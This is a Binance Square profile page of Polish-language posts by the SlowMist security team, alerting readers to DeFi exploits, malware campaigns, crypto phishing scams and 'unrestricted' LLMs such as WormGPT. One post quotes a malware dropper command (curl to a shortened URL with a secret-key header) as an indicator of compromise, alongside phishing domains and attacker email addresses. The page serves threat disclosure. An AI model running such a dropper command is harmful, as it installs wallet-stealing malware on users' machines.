Binance Square

SlowMist_Team

0 Obserwowani
1 Obserwujący
2 Polubione
0 Udostępnione
Posty
·
--
🚨Alert TI SlowMist🚨 Nasz system monitorujący MistEye wykrył podejrzane transakcje związane z @ResupplyFi, z stratami wynoszącymi około 5,59 mln USD. Napastnik zmanipulował kurs wymiany cvcrvUSD, dokonując darowizn na kontrakt Kontrolera cvcrvUSD, ostatecznie kradnąc dużą ilość tokenów reUSD. Jak zawsze, bądź czujny!
🚨Alert TI SlowMist🚨

Nasz system monitorujący MistEye wykrył podejrzane transakcje związane z @ResupplyFi, z stratami wynoszącymi około 5,59 mln USD.

Napastnik zmanipulował kurs wymiany cvcrvUSD, dokonując darowizn na kontrakt Kontrolera cvcrvUSD, ostatecznie kradnąc dużą ilość tokenów reUSD.

Jak zawsze, bądź czujny!
🚨Alert TI SlowMist🚨 Nasz system monitorowania MistEye wykrył podejrzane transakcje związane z @ResupplyFi, z stratami wynoszącymi około 5,59 mln USD. Napastnik zmanipulował kurs wymiany cvcrvUSD, dokonując darowizn na kontrakt kontrolera crvUSD, ostatecznie kradnąc dużą ilość tokenów reUSD. Jak zawsze, bądź czujny!
🚨Alert TI SlowMist🚨

Nasz system monitorowania MistEye wykrył podejrzane transakcje związane z @ResupplyFi, z stratami wynoszącymi około 5,59 mln USD.

Napastnik zmanipulował kurs wymiany cvcrvUSD, dokonując darowizn na kontrakt kontrolera crvUSD, ostatecznie kradnąc dużą ilość tokenów reUSD.

Jak zawsze, bądź czujny!
🚨 Ostrzeżenie TI SlowMist 🚨 Nowe złośliwe oprogramowanie o nazwie #SparkKitty, które kradnie wszystkie zdjęcia z zainfekowanych urządzeń iOS i Android — poszukując fraz seed do portfeli kryptowalutowych. ⚠️ Dostarczone przez: 🔸 "币coin" (App Store) 🔸 "SOEX" (Google Play, 10K+ instalacji, obecnie usunięta) 🔸 Aplikacje kasynowe, gry dla dorosłych, klony TikToka 🌍 Głównie celuje w użytkowników w Azji Południowo-Wschodniej i Chinach, ale bez ograniczeń regionalnych. 🛡️ Kluczowe wskazówki: 🔹 Nie instaluj nieznanych aplikacji 🔹 Unikaj sideloadingu APK 🔹 Używaj narzędzi antywirusowych Bądź czujny! (Źródło: @kaspersky)
🚨 Ostrzeżenie TI SlowMist 🚨

Nowe złośliwe oprogramowanie o nazwie #SparkKitty, które kradnie wszystkie zdjęcia z zainfekowanych urządzeń iOS i Android — poszukując fraz seed do portfeli kryptowalutowych.

⚠️ Dostarczone przez:
🔸 "币coin" (App Store)
🔸 "SOEX" (Google Play, 10K+ instalacji, obecnie usunięta)
🔸 Aplikacje kasynowe, gry dla dorosłych, klony TikToka

🌍 Głównie celuje w użytkowników w Azji Południowo-Wschodniej i Chinach, ale bez ograniczeń regionalnych.

🛡️ Kluczowe wskazówki:
🔹 Nie instaluj nieznanych aplikacji
🔹 Unikaj sideloadingu APK
🔹 Używaj narzędzi antywirusowych

Bądź czujny! (Źródło: @kaspersky)
💰Ponad 50 miliardów USDT w depozytach i 50 miliardów w wypłatach przepłynęło przez HuionePay w ciągu ostatnich 18 miesięcy — teraz pod globalnym nadzorem regulacyjnym za rzekome otrzymywanie, przesyłanie i wypłacanie funduszy związanych z oszustwami (głównie za pośrednictwem USDT na TRON). Zbadaliśmy dane z @MistTrack_io i zbudowaliśmy pulpit Dune, aby zobaczyć jego ślad w łańcuchu. 📊Pulpit: https://t.co/DHKtY3X9th ✍️Raport: https://t.co/O6uWC2S1qU #TRON #USDT #CryptoSecurity #AML #SlowMist #MistTrack #Huione
💰Ponad 50 miliardów USDT w depozytach i 50 miliardów w wypłatach przepłynęło przez HuionePay w ciągu ostatnich 18 miesięcy — teraz pod globalnym nadzorem regulacyjnym za rzekome otrzymywanie, przesyłanie i wypłacanie funduszy związanych z oszustwami (głównie za pośrednictwem USDT na TRON).

Zbadaliśmy dane z @MistTrack_io i zbudowaliśmy pulpit Dune, aby zobaczyć jego ślad w łańcuchu.

📊Pulpit: https://t.co/DHKtY3X9th
✍️Raport: https://t.co/O6uWC2S1qU

#TRON #USDT #CryptoSecurity #AML #SlowMist #MistTrack #Huione
🚨 Alert bezpieczeństwa TI 🚨 Zgodnie z informacjami od partnera społeczności @1nf0s3cpt, aktywna kampania phishingowa celuje w użytkowników Web3 z fałszywymi ofertami pracy (np. $120/godzinę), aby oszukać ich w wykonaniu złośliwego skryptu, który kradnie pliki portfeli. 🔍 Kluczowe IOCs: 🔸Repozytorium GitLab: https://t.co/ivGN93PS4b 🔸Dropper: curl https://t.co/fwRuktoVd9 -H "x-secret-key: _" 🧪 Metoda ataku jest bardzo podobna do wcześniejszego wykorzystania NPM przez Lazarusa do rozprzestrzeniania złośliwego kodu: https://t.co/bBC4i2vYpA 🚨 Odkryliśmy, że nowy złośliwy pakiet NPM został właśnie opublikowany: https://t.co/SjgmO1FOIL 🔸Prawdopodobnie powiązany z GitHub: apollo-hero 🔸Email przesyłającego: skelstar125@gmail.com ⚠️ Nie instaluj ani nie uruchamiaj nieznanych pakietów ani skryptów. Zawsze weryfikuj źródła. #LAZARUS #Phishing
🚨 Alert bezpieczeństwa TI 🚨

Zgodnie z informacjami od partnera społeczności @1nf0s3cpt, aktywna kampania phishingowa celuje w użytkowników Web3 z fałszywymi ofertami pracy (np. $120/godzinę), aby oszukać ich w wykonaniu złośliwego skryptu, który kradnie pliki portfeli.

🔍 Kluczowe IOCs:
🔸Repozytorium GitLab: https://t.co/ivGN93PS4b
🔸Dropper: curl https://t.co/fwRuktoVd9 -H "x-secret-key: _"

🧪 Metoda ataku jest bardzo podobna do wcześniejszego wykorzystania NPM przez Lazarusa do rozprzestrzeniania złośliwego kodu:
https://t.co/bBC4i2vYpA

🚨 Odkryliśmy, że nowy złośliwy pakiet NPM został właśnie opublikowany:
https://t.co/SjgmO1FOIL
🔸Prawdopodobnie powiązany z GitHub: apollo-hero
🔸Email przesyłającego: skelstar125@gmail.com

⚠️ Nie instaluj ani nie uruchamiaj nieznanych pakietów ani skryptów. Zawsze weryfikuj źródła.

#LAZARUS #Phishing
🚨Alert TI SlowMist🚨 MistEye wykrył potencjalne podejrzane działania związane z @Bankroll_Status . Jak zawsze, bądź czujny! https://bscscan.com/address/0xadefb902cab716b8043c5231ae9a50b8b4ee7c4e
🚨Alert TI SlowMist🚨

MistEye wykrył potencjalne podejrzane działania związane z @Bankroll_Status .

Jak zawsze, bądź czujny!

https://bscscan.com/address/0xadefb902cab716b8043c5231ae9a50b8b4ee7c4e
🚨Alert bezpieczeństwa SlowMist🚨 Wykryliśmy potencjalnie podejrzane działania związane z @meta_pool. Przyczyną jest to, że funkcja _deposit została przepisana, co umożliwia dowolne mintowanie za pomocą funkcji mint bez potrzeby transferu tokenów. Jak zawsze, bądź czujny!
🚨Alert bezpieczeństwa SlowMist🚨

Wykryliśmy potencjalnie podejrzane działania związane z @meta_pool. Przyczyną jest to, że funkcja _deposit została przepisana, co umożliwia dowolne mintowanie za pomocą funkcji mint bez potrzeby transferu tokenów.

Jak zawsze, bądź czujny!
🚨 Ostrzeżenie o bezpieczeństwie SlowMist🚨 ‼️Uważaj na nowe zagrożenie ze strony grupy APT LAZARUS — złośliwe oprogramowanie #OtterCookie kradnące informacje celuje w profesjonalistów w branży finansowej i kryptowalutowej. 🎯 Taktyki ataku: 🔹Podawanie się za renomowane firmy z fałszywymi rozmowami kwalifikacyjnymi lub propozycjami inwestycyjnymi 🔹Używanie deepfake'ów do podszywania się pod rozmówców/inwestorów w rozmowach wideo 🔹Oszuści wciągają ofiary w uruchamianie złośliwego oprogramowania przebrane za wyzwania programistyczne lub aktualizacje aplikacji wideo 🔹Po uruchomieniu, OtterCookie kradnie wrażliwe dane w ciszy 🕵️‍♂️ Cele obejmują: 🔹Poświadczenia przechowywane w przeglądarkach 🔹Hasła i certyfikaty w macOS Keychain 🔹Lokalnie przechowywane informacje o portfelach kryptowalutowych i klucze prywatne 🛡️ Bądź bezpieczny: 🔹Weryfikuj wszystkie niezamówione oferty pracy/inwestycji 🔹Nigdy nie uruchamiaj nieznanych plików binarnych, szczególnie „wyzwań” lub „aktualizacji” 🔹Używaj oprogramowania antywirusowego i monitoruj nietypowe zachowania 📚 Przeczytaj więcej o #APT: https://t.co/hyzwQoiu23 cc @im23pds
🚨 Ostrzeżenie o bezpieczeństwie SlowMist🚨

‼️Uważaj na nowe zagrożenie ze strony grupy APT LAZARUS — złośliwe oprogramowanie #OtterCookie kradnące informacje celuje w profesjonalistów w branży finansowej i kryptowalutowej.

🎯 Taktyki ataku:
🔹Podawanie się za renomowane firmy z fałszywymi rozmowami kwalifikacyjnymi lub propozycjami inwestycyjnymi
🔹Używanie deepfake'ów do podszywania się pod rozmówców/inwestorów w rozmowach wideo
🔹Oszuści wciągają ofiary w uruchamianie złośliwego oprogramowania przebrane za wyzwania programistyczne lub aktualizacje aplikacji wideo
🔹Po uruchomieniu, OtterCookie kradnie wrażliwe dane w ciszy

🕵️‍♂️ Cele obejmują:
🔹Poświadczenia przechowywane w przeglądarkach
🔹Hasła i certyfikaty w macOS Keychain
🔹Lokalnie przechowywane informacje o portfelach kryptowalutowych i klucze prywatne

🛡️ Bądź bezpieczny:
🔹Weryfikuj wszystkie niezamówione oferty pracy/inwestycji
🔹Nigdy nie uruchamiaj nieznanych plików binarnych, szczególnie „wyzwań” lub „aktualizacji”
🔹Używaj oprogramowania antywirusowego i monitoruj nietypowe zachowania

📚 Przeczytaj więcej o #APT:

https://t.co/hyzwQoiu23

cc @im23pds
🚨Alert bezpieczeństwa SlowMist🚨 SlowMist niedawno otrzymał informacje wskazujące, że grupa APT Lazarus używa nowego stealer'a o nazwie OtterCookie w ukierunkowanych atakach na profesjonalistów w dziedzinie kryptowalut i finansów. 🎭Taktyki: - Fałszywe rozmowy kwalifikacyjne/połączenia inwestorskie - Deepfake'owe filmy do podszywania się pod rekruterów - Złośliwe oprogramowanie przebrane za „wyzwania programistyczne” lub „aktualizacje” 😈Krady: - Zapisane w przeglądarkach dane logowania - Hasła i certyfikaty z macOS Keychain - Informacje o portfelu i klucze prywatne 🛡️Zalecenia dotyczące bezpieczeństwa: 🔹Traktuj niezamówione oferty pracy/inwestycji i rozmowy kwalifikacyjne zdalne z ostrożnością. 🔹Nigdy nie uruchamiaj nieznanych plików binarnych, szczególnie jeśli są przedstawiane jako „techniczne wyzwania” lub „pakiety aktualizacji.” 🔹Zwiększ możliwości EDR i monitoruj nietypową aktywność. Używaj narzędzi antywirusowych i regularnie audytuj swoje punkty końcowe. ⚠️Bądź bezpieczny — zawsze weryfikuj, zanim zaufasz. #Lazarus #APT #OtterCookie #CryptoSecurity
🚨Alert bezpieczeństwa SlowMist🚨

SlowMist niedawno otrzymał informacje wskazujące, że grupa APT Lazarus używa nowego stealer'a o nazwie OtterCookie w ukierunkowanych atakach na profesjonalistów w dziedzinie kryptowalut i finansów.

🎭Taktyki:
- Fałszywe rozmowy kwalifikacyjne/połączenia inwestorskie
- Deepfake'owe filmy do podszywania się pod rekruterów
- Złośliwe oprogramowanie przebrane za „wyzwania programistyczne” lub „aktualizacje”

😈Krady:
- Zapisane w przeglądarkach dane logowania
- Hasła i certyfikaty z macOS Keychain
- Informacje o portfelu i klucze prywatne

🛡️Zalecenia dotyczące bezpieczeństwa:
🔹Traktuj niezamówione oferty pracy/inwestycji i rozmowy kwalifikacyjne zdalne z ostrożnością.
🔹Nigdy nie uruchamiaj nieznanych plików binarnych, szczególnie jeśli są przedstawiane jako „techniczne wyzwania” lub „pakiety aktualizacji.”
🔹Zwiększ możliwości EDR i monitoruj nietypową aktywność. Używaj narzędzi antywirusowych i regularnie audytuj swoje punkty końcowe.

⚠️Bądź bezpieczny — zawsze weryfikuj, zanim zaufasz.

#Lazarus #APT #OtterCookie #CryptoSecurity
⚠️W miarę jak AI rozwija się, pojawia się ciemniejsza strona: Nieograniczone Duże Modele Językowe. W przeciwieństwie do mainstreamowych LLM-ów z wbudowanymi zabezpieczeniami, te "złamane" lub celowo zmodyfikowane modele są zaprojektowane tak, aby omijać ograniczenia etyczne—umożliwiając phishing, generowanie złośliwego oprogramowania i oszustwa. W tym artykule badamy wzrost narzędzi takich jak WormGPT, FraudGPT i GhostGPT, ich nadużycia w przestrzeni kryptowalutowej oraz rosnące wyzwania bezpieczeństwa, które stwarzają. Przeczytaj pełną analizę👇 https://t.co/yt1r95mlP4 #AI #Cyberbezpieczeństwo #LLM #Phishing #ZłośliweOprogramowanie
⚠️W miarę jak AI rozwija się, pojawia się ciemniejsza strona: Nieograniczone Duże Modele Językowe.

W przeciwieństwie do mainstreamowych LLM-ów z wbudowanymi zabezpieczeniami, te "złamane" lub celowo zmodyfikowane modele są zaprojektowane tak, aby omijać ograniczenia etyczne—umożliwiając phishing, generowanie złośliwego oprogramowania i oszustwa.

W tym artykule badamy wzrost narzędzi takich jak WormGPT, FraudGPT i GhostGPT, ich nadużycia w przestrzeni kryptowalutowej oraz rosnące wyzwania bezpieczeństwa, które stwarzają.

Przeczytaj pełną analizę👇
https://t.co/yt1r95mlP4

#AI #Cyberbezpieczeństwo #LLM #Phishing #ZłośliweOprogramowanie
🚨 Alert bezpieczeństwa SlowMist🚨 Trojan bankowy na Androida #Crocodilus teraz celuje w użytkowników kryptowalut i aplikacji bankowych na całym świecie po ostatnich aktualizacjach. ⚠️ Kluczowe zagrożenia: 🔹Rozprzestrzenia się za pomocą fałszywych aktualizacji przeglądarki w reklamach na Facebooku 🔹Kradnie dane logowania za pomocą ataków nakładkowych 🔹Wyciąga frazy seed portfela kryptowalutowego i klucze prywatne 🔹Wprowadza fałszywe numery "wsparcia bankowego" do list kontaktów 🔹Złośliwe oprogramowanie jako usługa: Dostępne do wynajęcia (100–300 USDT/atak) 📵 Unikaj nieznanych aktualizacji aplikacji i linków reklamowych. Bądź czujny! (Źródło: @ThreatFabric)
🚨 Alert bezpieczeństwa SlowMist🚨

Trojan bankowy na Androida #Crocodilus teraz celuje w użytkowników kryptowalut i aplikacji bankowych na całym świecie po ostatnich aktualizacjach.

⚠️ Kluczowe zagrożenia:

🔹Rozprzestrzenia się za pomocą fałszywych aktualizacji przeglądarki w reklamach na Facebooku
🔹Kradnie dane logowania za pomocą ataków nakładkowych
🔹Wyciąga frazy seed portfela kryptowalutowego i klucze prywatne
🔹Wprowadza fałszywe numery "wsparcia bankowego" do list kontaktów
🔹Złośliwe oprogramowanie jako usługa: Dostępne do wynajęcia (100–300 USDT/atak)

📵 Unikaj nieznanych aktualizacji aplikacji i linków reklamowych.

Bądź czujny! (Źródło: @ThreatFabric)
🚨Podsumowanie bezpieczeństwa Web3 z maja 2025🚨 📊Zgodnie z raportem SlowMist Hacked(https://t.co/e90CSvTm6B): ⚠️15 hacków ➡️ ~$257M straty ❄️~$162M odzyskano/zablokowano 🎣Straty z phishingu za pośrednictwem @realScamSniffer: 7,164 ofiar ➡️ ~$9.6M skradziono Główne incydenty: • Protokoł Cetus stracił $230M w ataku z przepełnieniem matematycznym • Protokoł Cork wykorzystany na ponad $12M z powodu niewystarczającej walidacji danych dostarczonych przez użytkowników • BitoPro stracił $11.5M; fundusze prane za pomocą Tornado Cash, Thorchain i Wasabi • Demex stracił $950K z powodu manipulacji oraklem celującym w przestarzały sejf • Protokoł Zunami stracił $500K; przyczyna główna w trakcie dochodzenia Najważniejsze informacje o bezpieczeństwie: ⚠️Luki w kontraktach spowodowały 95% całkowitych strat w hackach 🎭Przejęcia kont znowu wzrosły 😈Grupa Lazarus teraz celuje w osoby prywatne—jedna ofiara straciła $5.2M na złośliwym oprogramowaniu ✍️Pełny raport:
🚨Podsumowanie bezpieczeństwa Web3 z maja 2025🚨

📊Zgodnie z raportem SlowMist Hacked(https://t.co/e90CSvTm6B):
⚠️15 hacków ➡️ ~$257M straty
❄️~$162M odzyskano/zablokowano

🎣Straty z phishingu za pośrednictwem @realScamSniffer:
7,164 ofiar ➡️ ~$9.6M skradziono

Główne incydenty:
• Protokoł Cetus stracił $230M w ataku z przepełnieniem matematycznym
• Protokoł Cork wykorzystany na ponad $12M z powodu niewystarczającej walidacji danych dostarczonych przez użytkowników
• BitoPro stracił $11.5M; fundusze prane za pomocą Tornado Cash, Thorchain i Wasabi
• Demex stracił $950K z powodu manipulacji oraklem celującym w przestarzały sejf
• Protokoł Zunami stracił $500K; przyczyna główna w trakcie dochodzenia

Najważniejsze informacje o bezpieczeństwie:
⚠️Luki w kontraktach spowodowały 95% całkowitych strat w hackach
🎭Przejęcia kont znowu wzrosły
😈Grupa Lazarus teraz celuje w osoby prywatne—jedna ofiara straciła $5.2M na złośliwym oprogramowaniu

✍️Pełny raport:
🚨Ostrzeżenie przed oszustwem Niedawno pomogliśmy użytkownikowi, który natknął się na podejrzane narzędzie twierdzące, że jego portfel ma „ryzykowną autoryzację”. Narzędzie poprosiło go o wklejenie swojego klucza prywatnego, aby rozwiązać problem. Po przeprowadzeniu dochodzenia zidentyfikowaliśmy stronę—signature[.]land—jako platformę phishingową. Strona została również oznaczona jako złośliwa przez platformę antyoszustw Web3 @realScamSniffer. Najważniejsze ustalenia: ♦️Interfejs udaje legalne narzędzie Revoke ♦️Wyniki ryzyka są fałszowane dla dowolnego wejścia ♦️Wszystkie dane wejściowe użytkownika są wysyłane bezpośrednio do: abpulimali@gmail[.]com Operator stojący za tą stroną, @Titanspace3, stosuje wiele zwodniczych taktyk: 🎭Używa awatara @zachxbt na Telegramie 🎭Podaje się za pracownika SlowMist 🎭Prowadzi konto X z 74 tys. obserwujących, często komentując pod postami użytkowników kryptowalut, fałszywie twierdząc, że ich portfele są zagrożone i kierując ich do linku phishingowego, udającego „narzędzie bezpieczeństwa”. Schemat oszustwa: 1⃣Tworzenie paniki wokół „ryzykownych zatwierdzeń” 2⃣Wciąganie ofiar do korzystania z strony phishingowej 3⃣Instrukcje dotyczące wprowadzania kluczy prywatnych w celu „anulowania” 🛡️Rekomendacje – Nigdy nie wklejaj swojego klucza prywatnego na żadnej stronie internetowej – Używaj tylko narzędzi bezpieczeństwa z zweryfikowanych, oficjalnych źródeł – Bądź czujny i stosuj podejście zero zaufania Aby uzyskać pełne podsumowanie tej sprawy, zobacz nasz najnowszy artykuł: https://t.co/IvrVPrT6Su #Phishing #Krypto #Web3 #Oszustwo #InżynieriaSpołeczna #Revoke
🚨Ostrzeżenie przed oszustwem

Niedawno pomogliśmy użytkownikowi, który natknął się na podejrzane narzędzie twierdzące, że jego portfel ma „ryzykowną autoryzację”. Narzędzie poprosiło go o wklejenie swojego klucza prywatnego, aby rozwiązać problem.

Po przeprowadzeniu dochodzenia zidentyfikowaliśmy stronę—signature[.]land—jako platformę phishingową. Strona została również oznaczona jako złośliwa przez platformę antyoszustw Web3 @realScamSniffer.

Najważniejsze ustalenia:
♦️Interfejs udaje legalne narzędzie Revoke
♦️Wyniki ryzyka są fałszowane dla dowolnego wejścia
♦️Wszystkie dane wejściowe użytkownika są wysyłane bezpośrednio do: abpulimali@gmail[.]com

Operator stojący za tą stroną, @Titanspace3, stosuje wiele zwodniczych taktyk:
🎭Używa awatara @zachxbt na Telegramie
🎭Podaje się za pracownika SlowMist
🎭Prowadzi konto X z 74 tys. obserwujących, często komentując pod postami użytkowników kryptowalut, fałszywie twierdząc, że ich portfele są zagrożone i kierując ich do linku phishingowego, udającego „narzędzie bezpieczeństwa”.

Schemat oszustwa:
1⃣Tworzenie paniki wokół „ryzykownych zatwierdzeń”
2⃣Wciąganie ofiar do korzystania z strony phishingowej
3⃣Instrukcje dotyczące wprowadzania kluczy prywatnych w celu „anulowania”

🛡️Rekomendacje
– Nigdy nie wklejaj swojego klucza prywatnego na żadnej stronie internetowej
– Używaj tylko narzędzi bezpieczeństwa z zweryfikowanych, oficjalnych źródeł
– Bądź czujny i stosuj podejście zero zaufania

Aby uzyskać pełne podsumowanie tej sprawy, zobacz nasz najnowszy artykuł:
https://t.co/IvrVPrT6Su

#Phishing #Krypto #Web3 #Oszustwo #InżynieriaSpołeczna #Revoke
🎉 SlowMist x Foresight News Festiwal Smoczych Łodzi 🎉 Twoja fraza mnemoniczna to życiodajna nić twojej kryptowaluty — trzymaj ją w bezpieczeństwie, pamiętaj o niej. 🧠⛓️ @Foresight_News właśnie wypuścił nowy ciekawy kolekcjonerski przedmiot, dajemy 3 na rzecz społeczności! Aby wziąć udział: 1⃣ Obserwuj @Foresight_News & @SlowMist_Team 2⃣ Polub + RT ten tweet & oznacz 3 przyjaciół Zwycięzcy ogłoszeni: 4 czerwca 🎁 Powodzenia dla wszystkich!🤩
🎉 SlowMist x Foresight News Festiwal Smoczych Łodzi 🎉

Twoja fraza mnemoniczna to życiodajna nić twojej kryptowaluty — trzymaj ją w bezpieczeństwie, pamiętaj o niej. 🧠⛓️

@Foresight_News właśnie wypuścił nowy ciekawy kolekcjonerski przedmiot, dajemy 3 na rzecz społeczności!

Aby wziąć udział:
1⃣ Obserwuj @Foresight_News & @SlowMist_Team
2⃣ Polub + RT ten tweet & oznacz 3 przyjaciół

Zwycięzcy ogłoszeni: 4 czerwca 🎁

Powodzenia dla wszystkich!🤩
🚨Ostrzeżenie o bezpieczeństwie SlowMist🚨 Wykryliśmy potencjalną podejrzaną aktywność związaną z @Corkprotocol. Jak zawsze, bądź czujny!
🚨Ostrzeżenie o bezpieczeństwie SlowMist🚨

Wykryliśmy potencjalną podejrzaną aktywność związaną z @Corkprotocol.

Jak zawsze, bądź czujny!
🚨Alert bezpieczeństwa SlowMist🚨 ☠️Ostatnio wielu użytkowników zgłosiło otrzymywanie wiadomości SMS z "znanych giełd", w których napisano: 🎭"Twój kod weryfikacji wypłaty to xxx. Jeśli nie żądałeś tej transakcji, natychmiast zadzwoń pod numer xxx po pomoc." 📱Gdy oddzwonisz, mówiono ci, że to "naruszenie bezpieczeństwa" i łączono cię z kimś, kto twierdzi, że pochodzi z "wsparcia portfela sprzętowego". 🎣Prowadzą cię na stronę phishingową i oszukują, abyś wpisał swoją frazę mnemoniczna — co prowadzi do kradzieży zimnych portfeli o wartości ponad 1 miliona dolarów. ⚠️Oszuści wiedzą, że ufasz giełdom — i wykorzystują tę ufność, aby cię oszukiwać, krok po kroku. Ostatnio ujawniliśmy podobny przypadek — zapoznaj się z naszym szczegółowym artykułem, aby wzmocnić swoją świadomość i obronę: https://t.co/OLGtlY1HBV Pamiętaj: 🔒Nigdy nie dziel się swoją frazą mnemoniczna. 🚫Nie ufaj niespodziewanym połączeniom, wiadomościom tekstowym ani linkom. Zawsze weryfikuj za pośrednictwem oficjalnych źródeł. #Web3Security #PhishingAlert #ColdWallet #CryptoScam #SocialEngineering
🚨Alert bezpieczeństwa SlowMist🚨

☠️Ostatnio wielu użytkowników zgłosiło otrzymywanie wiadomości SMS z "znanych giełd", w których napisano:

🎭"Twój kod weryfikacji wypłaty to xxx. Jeśli nie żądałeś tej transakcji, natychmiast zadzwoń pod numer xxx po pomoc."

📱Gdy oddzwonisz, mówiono ci, że to "naruszenie bezpieczeństwa" i łączono cię z kimś, kto twierdzi, że pochodzi z "wsparcia portfela sprzętowego".

🎣Prowadzą cię na stronę phishingową i oszukują, abyś wpisał swoją frazę mnemoniczna — co prowadzi do kradzieży zimnych portfeli o wartości ponad 1 miliona dolarów.

⚠️Oszuści wiedzą, że ufasz giełdom — i wykorzystują tę ufność, aby cię oszukiwać, krok po kroku.

Ostatnio ujawniliśmy podobny przypadek — zapoznaj się z naszym szczegółowym artykułem, aby wzmocnić swoją świadomość i obronę:
https://t.co/OLGtlY1HBV

Pamiętaj:
🔒Nigdy nie dziel się swoją frazą mnemoniczna.
🚫Nie ufaj niespodziewanym połączeniom, wiadomościom tekstowym ani linkom. Zawsze weryfikuj za pośrednictwem oficjalnych źródeł.

#Web3Security #PhishingAlert #ColdWallet #CryptoScam #SocialEngineering
W ostatnich latach użytkownicy Coinbase wielokrotnie stawali się celem ataków inżynierii społecznej — a 15 maja Coinbase potwierdziło zaangażowanie osób z wewnątrz. Jak to działa: 📞 Fałszywy telefon wsparcia 📲 Przeprowadzenie użytkownika przez Coinbase Wallet ⚠️ Podanie oszukańczej frazy mnemonicznej 💸 Wyczyszczenie aktywów pod presją & pilnością Z @MistTrack_io prześledziliśmy przepływy: ▪️ BTC mostkowane przez THORChain / Chainflip / Defiway Bridge → DAI/USDT ▪️ ETH wymieniane na Uniswap → DAI/USDT ▪️ Fundusze prane lub wciąż uśpione Pełne zestawienie👇 https://t.co/OLGtlY2frt #CryptoSecurity #SocialEngineering #Web3Security #Coinbase #Phishing
W ostatnich latach użytkownicy Coinbase wielokrotnie stawali się celem ataków inżynierii społecznej — a 15 maja Coinbase potwierdziło zaangażowanie osób z wewnątrz.

Jak to działa:

📞 Fałszywy telefon wsparcia
📲 Przeprowadzenie użytkownika przez Coinbase Wallet
⚠️ Podanie oszukańczej frazy mnemonicznej
💸 Wyczyszczenie aktywów pod presją & pilnością

Z @MistTrack_io prześledziliśmy przepływy:

▪️ BTC mostkowane przez THORChain / Chainflip / Defiway Bridge → DAI/USDT
▪️ ETH wymieniane na Uniswap → DAI/USDT
▪️ Fundusze prane lub wciąż uśpione

Pełne zestawienie👇
https://t.co/OLGtlY2frt

#CryptoSecurity #SocialEngineering #Web3Security #Coinbase #Phishing
🚨Ostrzeżenie o bezpieczeństwie SlowMist🚨 Wykryliśmy potencjalnie podejrzaną aktywność związaną z @Nexo. Jak zawsze, bądź czujny! https://bscscan.com/address/0x0851ae80e137c53a8dbc48fce82efd1f50f3b9f2
🚨Ostrzeżenie o bezpieczeństwie SlowMist🚨

Wykryliśmy potencjalnie podejrzaną aktywność związaną z @Nexo.

Jak zawsze, bądź czujny!

https://bscscan.com/address/0x0851ae80e137c53a8dbc48fce82efd1f50f3b9f2
🚨Ostrzeżenie przed oszustwem SlowMist🚨 Otrzymaliśmy zgłoszenia o fałszywych grupach na Telegramie podszywających się pod #SlowMist i oszukujących użytkowników za pomocą phishingowych linków inwestycyjnych. Jeden przykład: ❌t[.]me/slowmist1 — to NIE my.‼️ ✅ Proszę zgłaszać takie grupy do Telegramu natychmiast. Dla twojego bezpieczeństwa, zawsze odwołuj się do naszych oficjalnych kanałów: 1⃣Strona internetowa: https://t.co/IO2VWk2pae 2⃣X: @SlowMist_Team & @MistTrack_io 3⃣Email: team@slowmist.com W razie wątpliwości, nie wahaj się skontaktować z nami bezpośrednio. ⚠️Bądź czujny i weryfikuj zanim zaufasz.
🚨Ostrzeżenie przed oszustwem SlowMist🚨

Otrzymaliśmy zgłoszenia o fałszywych grupach na Telegramie podszywających się pod #SlowMist i oszukujących użytkowników za pomocą phishingowych linków inwestycyjnych. Jeden przykład: ❌t[.]me/slowmist1 — to NIE my.‼️

✅ Proszę zgłaszać takie grupy do Telegramu natychmiast.

Dla twojego bezpieczeństwa, zawsze odwołuj się do naszych oficjalnych kanałów:
1⃣Strona internetowa: https://t.co/IO2VWk2pae
2⃣X: @SlowMist_Team & @MistTrack_io
3⃣Email: team@slowmist.com

W razie wątpliwości, nie wahaj się skontaktować z nami bezpośrednio.

⚠️Bądź czujny i weryfikuj zanim zaufasz.
🚀Wielkie wieści! @MistTrack_io MCP jest teraz dostępne do testów! Możesz teraz używać języka naturalnego w #Claude, #Cursor i innych klientach wspierających MCP, aby wywoływać API analizy on-chain #MistTrack — od profilowania adresów & oceny ryzyka po grafy przepływu funduszy. 🧐Inteligentniejsze, szybsze i łatwiejsze badania blockchainowe — napędzane przez AI. ✍️W naszym najnowszym poście: 🔹Czym jest MistTrack MCP 🔹Jak to wykorzystać 🔹Główne cechy 🔹Przykłady rzeczywistych zastosowań https://t.co/Fvn2YZIuoI 👋Gotowy na odkrywanie nowego paradygmatu AI dla śledzenia on-chain? Zacznij tutaj: https://t.co/UCDcC9Dt51 #Web3 #AI #BezpieczeństwoBlockchain #MCP
🚀Wielkie wieści! @MistTrack_io MCP jest teraz dostępne do testów!

Możesz teraz używać języka naturalnego w #Claude, #Cursor i innych klientach wspierających MCP, aby wywoływać API analizy on-chain #MistTrack — od profilowania adresów & oceny ryzyka po grafy przepływu funduszy.

🧐Inteligentniejsze, szybsze i łatwiejsze badania blockchainowe — napędzane przez AI.

✍️W naszym najnowszym poście:
🔹Czym jest MistTrack MCP
🔹Jak to wykorzystać
🔹Główne cechy
🔹Przykłady rzeczywistych zastosowań
https://t.co/Fvn2YZIuoI

👋Gotowy na odkrywanie nowego paradygmatu AI dla śledzenia on-chain? Zacznij tutaj:
https://t.co/UCDcC9Dt51

#Web3 #AI #BezpieczeństwoBlockchain #MCP
Zaloguj się, aby odkryć więcej treści
Poznaj najnowsze wiadomości dotyczące krypto
⚡️ Weź udział w najnowszych dyskusjach na temat krypto
💬 Współpracuj ze swoimi ulubionymi twórcami
👍 Korzystaj z treści, które Cię interesują
E-mail / Numer telefonu
Mapa strony
Preferencje dotyczące plików cookie
Regulamin platformy